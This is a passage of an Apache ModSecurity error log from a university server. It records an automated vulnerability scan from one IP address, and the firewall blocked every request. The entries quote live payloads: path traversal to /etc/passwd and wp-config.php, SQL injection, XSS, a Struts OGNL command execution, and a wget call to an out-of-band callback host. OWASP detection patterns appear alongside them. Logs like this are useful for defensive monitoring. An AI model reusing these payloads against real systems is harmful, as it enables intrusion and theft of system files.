"repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAk2KXcAAAAb"]
[Tue Aug 29 11:48:40.361891 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAlUleUAAAA0"]
[Tue Aug 29 11:48:43.363192 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAluT1QAAAAe"]
[Tue Aug 29 11:48:43.408224 2023] [:error] [pid 2362] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAk6PDAAAAAh"]
[Tue Aug 29 11:48:47.473538 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAmFnykAAAAx"]
[Tue Aug 29 11:48:49.372661 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAlyrBEAAAAI"]
[Tue Aug 29 11:48:49.398902 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAl74tQAAAAj"]
[Tue Aug 29 11:48:49.445425 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAlyrBQAAAAI"]
[Tue Aug 29 11:48:50.430042 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAkwQTEAAAAS"]
[Tue Aug 29 11:48:52.364541 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAk2KZEAAAAb"]
[Tue Aug 29 11:48:53.355964 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAkwQTYAAAAS"]
[Tue Aug 29 11:48:53.370483 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tcCo-f0AAAkoTl4AAAAH"]
[Tue Aug 29 11:48:54.413336 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAl4sTsAAAAf"]
[Tue Aug 29 11:48:55.403575 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAmFnzUAAAAx"]
[Tue Aug 29 11:48:56.387871 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAlUlf0AAAA0"]
[Tue Aug 29 11:48:57.464632 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAkksP8AAAAA"]
[Tue Aug 29 11:48:57.501021 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAk1w8wAAAAY"]
[Tue Aug 29 11:48:58.365105 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14usCo-f0AAAkoTmQAAAAH"]
[Tue Aug 29 11:48:58.372941 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14usCo-f0AAAltVZsAAAAR"]
[Tue Aug 29 11:48:59.439884 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAfWN9cAAAAL"]
[Tue Aug 29 11:49:02.416016 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26guosdm7qt8ctey.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAlV8DUAAAA1"]
[Tue Aug 29 11:49:04.471755 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAmHd5kAAAAz"]
[Tue Aug 29 11:49:05.465225 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAkmTiwAAAAF"]
[Tue Aug 29 11:49:08.473226 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAl4sUsAAAAf"]
[Tue Aug 29 11:49:09.476729 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAmQ-t4AAAAb"]
[Tue Aug 29 11:49:10.453954 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAmG@rsAAAAy"]
[Tue Aug 29 11:49:15.385028 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAkle24AAAAD"]
[Tue Aug 29 11:51:05.220281 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAfWOAwAAAAL"]
[Tue Aug 29 11:51:05.406186 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAfWOBIAAAAL"]
[Tue Aug 29 11:51:05.439697 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAknELwAAAAB"]
[Tue Aug 29 11:51:05.856642 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAlIBfEAAAAn"]
[Tue Aug 29 11:51:06.153366 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OsCo-f0AAAlIBf0AAAAn"]
